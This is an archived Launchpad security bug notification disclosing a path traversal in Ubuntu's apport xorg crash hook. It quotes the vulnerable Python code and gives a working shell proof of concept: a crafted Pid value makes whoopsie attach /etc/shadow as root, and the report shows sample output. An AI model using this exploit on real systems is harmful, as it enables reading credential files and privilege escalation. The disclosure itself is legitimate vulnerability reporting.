← Back to team overview

openjdk team mailing list archive

[Bug 1933832] Re: Path traversal leads to arbitrary file read

 

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of OpenJDK,
which is subscribed to openjdk-8 in Ubuntu.
https://bugs.launchpad.net/bugs/1933832

Title:
  Path traversal leads to arbitrary file read

Status in apport package in Ubuntu:
  Fix Released
Status in openjdk-13 package in Ubuntu:
  New
Status in openjdk-14 package in Ubuntu:
  New
Status in openjdk-15 package in Ubuntu:
  New
Status in openjdk-16 package in Ubuntu:
  New
Status in openjdk-17 package in Ubuntu:
  New
Status in openjdk-18 package in Ubuntu:
  New
Status in openjdk-8 package in Ubuntu:
  New
Status in xorg package in Ubuntu:
  New

Bug description:
  While reiterating the issues reported in
  https://bugs.launchpad.net/bugs/1917904, Stephen Röttger (@_tsuro)
  mentioned, that the second issue "Arbitrary file read in package-
  hooks/source_xorg.py (Info)" might additionally contain a path
  traversal vulnerability. This was confirmed by developing a PoC, that
  enables a user to read arbitrary files in the context of the root
  user, leading to elevation of privileges. Exploiting this issue
  requires, that automatic crash reporting is enabled.

  The following excerpt of the file `package-hooks/source_xorg.py` shows the vulnerable code:
   
  if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
      compiz_pid = 0
      pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])       # [0]
      if pid_line:
          compiz_pid = pid_line.groups()[0]
      compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid  # [1]
      attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")

  While in [0] the `pid_line` is extracted, this value (if successfully matched) is appended to the file path resulting in `compiz_state_file` [1], which is subsequently attached to the crash file.
  Using a `Pid` such as `JRN/../../../../etc/shadow` therefore results in the file `/etc/shadow` being attached (after creating the directory `/tmp/compiz_internal_stateJRN`).

  The following POC (tested on 20.04/21.04 Desktop) exploits this issue
  to read the file `/etc/shadow`:

  mkdir /tmp/compiz_internal_stateJRN/;pid=$'\tJRN/../../../etc/shadow';cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: source_xorg 123
  SourcePackage: compiz
  ProcStatus:
   Pid:$pid
   Uid:$pid
  EOF

  When reading the crash file (after `whoopsie-upload-all` ran), the contents of the file `/etc/shadow` are indeed attached:
  grep -A3 compiz_internal /var/crash/poc.crash            
  compiz_internal_states:
   root:!:18393:0:99999:7:::
   daemon:*:18375:0:99999:7:::
   bin:*:18375:0:99999:7:::

  Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.

  Best regards,
  Maik

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832/+subscriptions